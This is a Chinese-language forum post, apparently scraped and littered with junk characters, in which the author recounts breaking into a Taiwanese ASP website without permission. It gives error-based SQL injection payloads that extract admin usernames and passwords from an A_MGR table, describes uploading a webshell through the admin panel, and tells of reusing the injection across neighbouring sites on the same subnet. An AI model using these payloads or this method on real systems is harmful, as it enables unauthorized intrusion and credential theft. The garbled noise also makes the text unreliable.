发现一个注入点0 Z" c( X, E S) r0 t9 O: d+ S
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
& }! B5 j+ s+ a: E, b2 b2 y; \& U
习惯性的加’having1=1--
* f# E, f& g+ t: [
) O( u2 X2 H lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) R' A6 \) h" m' J% m5 \2 c* H" B5 T/ @
0, h# y- _" A, `7 u+ a
* Y, V" D$ O6 ?( j爆出Diary_A.dl_Title(这时候很激动啊)
% ?% n; O( k5 ~3 S# ~
1 Y( F; {. I4 e/ A那么继续
1 |" f) l3 g6 xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
+ u4 s& m/ R. a* r* S
7 s" x) Y$ F$ i! {8 ^& K8 S继续,一直爆下去
2 P. X, z: @% G- ?' A8 }# _2 E6 ^# i6 r2 L; G/ k: s
爆到几个字段和表段 但是没找到需要的管理用户的字段; y: X% x0 w7 p% ^* [: F6 u) m
* W8 S) r6 b, Q, Q6 J) R; K* q6 r! v) l
蛋疼了 怎么办 然后去后台登陆页看源码/ o$ |' K4 J( r
9 S7 S/ z$ C3 A2 ?' I0+ P! L- h1 ]2 m# U, ^0 u$ ~ m
% C/ W! \- b- [$ l- M2 pInput name= “ADUID”
, n* i1 |2 y" h7 }Input name= “ADPWD”
9 p( y- H, B' z4 R& R' X1 t1 v; a
+ o6 q& U. l+ z. n# z% U很幸运 找到了字段那就继续) w9 q; U* W5 J
找到之后开始爆用户
! b3 U' W9 @' j7 b# B/ ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
% u( G1 }0 P, {( U2 ?7 I爆密码5 W2 V, @, X. ]' ]3 _* d' h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—9 y/ \' K+ K& G9 [( b
测试了下 这个注入点只能爆到文章哪里的表 ) b9 i+ X8 k& N9 p; h" T9 V
/ t1 ?3 M1 w7 ~- k
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了/ b ^7 |: T+ j7 S9 Z
' T. A- N! q* L$ ?6 {又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
q# i/ W' g- I
7 P" t5 C/ s% P4737 \6 x" c* X1 ?2 W' `! o; K
5 d; w1 Y6 k `$ `+ b/ M进后台9 I$ O2 N, x4 `2 T4 h9 B$ e
: K; e3 s: F) c: |" |
5 P6 v9 g5 |) l6 ~
发现几个上传点 有的地方不能上传 而且防止恶意代码
2 K+ }+ L; M' Y* A/ e) z4 M7 O' @3 Z3 o& Z, e7 V4 U. E
没办法 各种百度各种找大牛 找到一只好像可以突破的马! l, V0 m1 i2 O @& q( |) ^
9 o0 I2 W1 E# I
# ]( h! a6 B, A在系统管理那里直接上传 不过没有显示地址; k3 ^1 e$ {* Z. S% D
, ?2 C" I) r& O* U: m! D! |) M" ?
再上传一次 抓包 搞定OK5 C! N3 L! @; g+ H8 |
l1 S4 ^; ?; I0 o( U
; J0 S$ h' [, S# o' a, T; r' M; h0 s) | @7 ]8 a) J
472# w% g6 u: m0 P" O; U6 ]
* i+ y$ V. \0 x: a1 S晚上不行了 去睡觉。。。
; h( Y# E2 k+ U8 K5 h( Y& y第二天刚起床 闲的没事做继续日站吧 ) x/ c7 c* Y* Q6 v' J
& e! x' v+ s5 A1 U+ @4 t
找个站 就把这个站的旁c扫了下
: h* n+ A7 r7 k! @5 _
# C- k0 c9 e9 t E+ T5 v; Z; ^发现c段也有一个购物站 ,然后还和这个站的模板差不多
) Q {; m7 } {3 H; M* L' o0 a
1 o ~1 P; c K2 E' z就找到会员登录口测试
: q' l F# C: `) i9 y/ \4 R& ]2 y
( v7 C6 ^5 m/ V'and (select top 1 MGR_UID from A_MGR)>0—1 O( }) D) c U9 q8 z
果断爆到了 这时候我很激动 通杀0 _% M" s4 y+ f4 I0 p. r( j8 v
+ m% T( _! l- ]# N再次翻c段
D9 J% l4 w4 c6 Z, o/ U3 {
) I2 S. [1 x7 x- m翻出几个站 都成功拿下- E7 u. F9 A+ |+ Q3 R
. [8 |. ~* O6 L& A4 J. D: y K4 q
+ p( L* p I0 E! O! ~4 b& v7 K7 D5 e; [1 u4 o7 P2 Y
修复方案:
% s! ]( y+ ^. j8 X他们比我专业 $ U! S, E- F; L% u, E
# V1 c1 A9 C$ K8 X
% O) _5 Z8 [3 u
- X( \1 j1 l5 n* }- l |